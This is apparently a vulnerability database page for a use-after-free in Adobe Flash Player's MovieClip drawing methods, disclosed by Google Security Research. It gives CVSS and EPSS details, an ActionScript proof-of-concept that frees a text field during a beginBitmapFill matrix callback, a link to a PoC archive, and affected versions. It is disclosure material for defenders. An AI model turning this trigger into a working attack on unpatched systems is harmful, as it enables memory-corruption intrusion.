Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
10 |
|
AV:N/AC:L/Au:N/C:C/I:C/A:C |
[email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 37864
Publication date : 2015-08-18 22h00 +00:00
Author : Google Security Research
EDB Verified : Yes
Source: https://code.google.com/p/google-security-research/issues/detail?id=388&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
There are use-after frees realated to storing a single pointer (this this pointer) in several MovieClip drawing methods, including beginFill, beginBitmapFill, beginGradientFill, linGradientStyle, lineTo, moveTo, curveTo and lineStyle. A proof-of-concept involving bitmapFill is bewlo:
import flash.display.*;
import flash.geom.*;
var bmpd:BitmapData = new BitmapData(20,20);
var rect1:Rectangle = new Rectangle(0,0,10,10);
var rect2:Rectangle = new Rectangle(0, 10, 10, 20);
var rect3:Rectangle = new Rectangle(10, 0, 20, 10);
var rect4:Rectangle = new Rectangle(10, 10, 20, 20);
bmpd.fillRect(rect1, 0xAA0000FF);
bmpd.fillRect(rect2, 0xAA00FF00);
bmpd.fillRect(rect3, 0xAAFF0000);
bmpd.fillRect(rect4, 0xAA999999);
var thiz = this;
this.createEmptyMovieClip("bmp_fill_mc", 1);
with (bmp_fill_mc) {
var n = {valueOf: func};
matrix = {a:2, b:n, c:0, d:2, tx:0, ty:0};
//matrix.rotate(Math.PI/8);
repeat = true;
smoothing = true;
beginBitmapFill(bmpd, matrix, repeat, smoothing);
moveTo(0, 0);
lineTo(0, 60);
lineTo(60, 60);
lineTo(60, 0);
lineTo(0, 0);
endFill();
}
bmp_fill_mc._xscale = 200;
bmp_fill_mc._yscale = 200;
function func(){
var test = thiz.createTextField("test", 1, 1, 1, 10, 10);
trace(test);
test.removeTextField();
return 777;
}
A sample fla and swf are attached.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37864.zip
Products Mentioned
Configuraton 0
Adobe>>Flash_player >> Version To (including) 13.0.0.289
Adobe>>Flash_player >> Version 14.0.0.125
Adobe>>Flash_player >> Version 14.0.0.145
Adobe>>Flash_player >> Version 14.0.0.176
Adobe>>Flash_player >> Version 14.0.0.179
Adobe>>Flash_player >> Version 15.0.0.152
Adobe>>Flash_player >> Version 15.0.0.167
Adobe>>Flash_player >> Version 15.0.0.189
Adobe>>Flash_player >> Version 15.0.0.223
Adobe>>Flash_player >> Version 15.0.0.239
Adobe>>Flash_player >> Version 15.0.0.246
Adobe>>Flash_player >> Version 16.0.0.235
Adobe>>Flash_player >> Version 16.0.0.257
Adobe>>Flash_player >> Version 16.0.0.287
Adobe>>Flash_player >> Version 16.0.0.296
Adobe>>Flash_player >> Version 17.0.0.134
Adobe>>Flash_player >> Version 17.0.0.169
Adobe>>Flash_player >> Version 17.0.0.188
Adobe>>Flash_player >> Version 17.0.0.190
Adobe>>Flash_player >> Version 18.0.0.160
Adobe>>Flash_player >> Version 18.0.0.194
Apple>>Mac_os_x >> Version -
Microsoft>>Windows >> Version -
Configuraton 0
Adobe>>Air >> Version To (including) 18.0.0.144
Adobe>>Air_sdk >> Version To (including) 18.0.0.144
Adobe>>Air_sdk_\&_compiler >> Version To (including) 18.0.0.144
Configuraton 0
Adobe>>Flash_player >> Version To (including) 11.2.202.468
Linux>>Linux_kernel >> Version -
References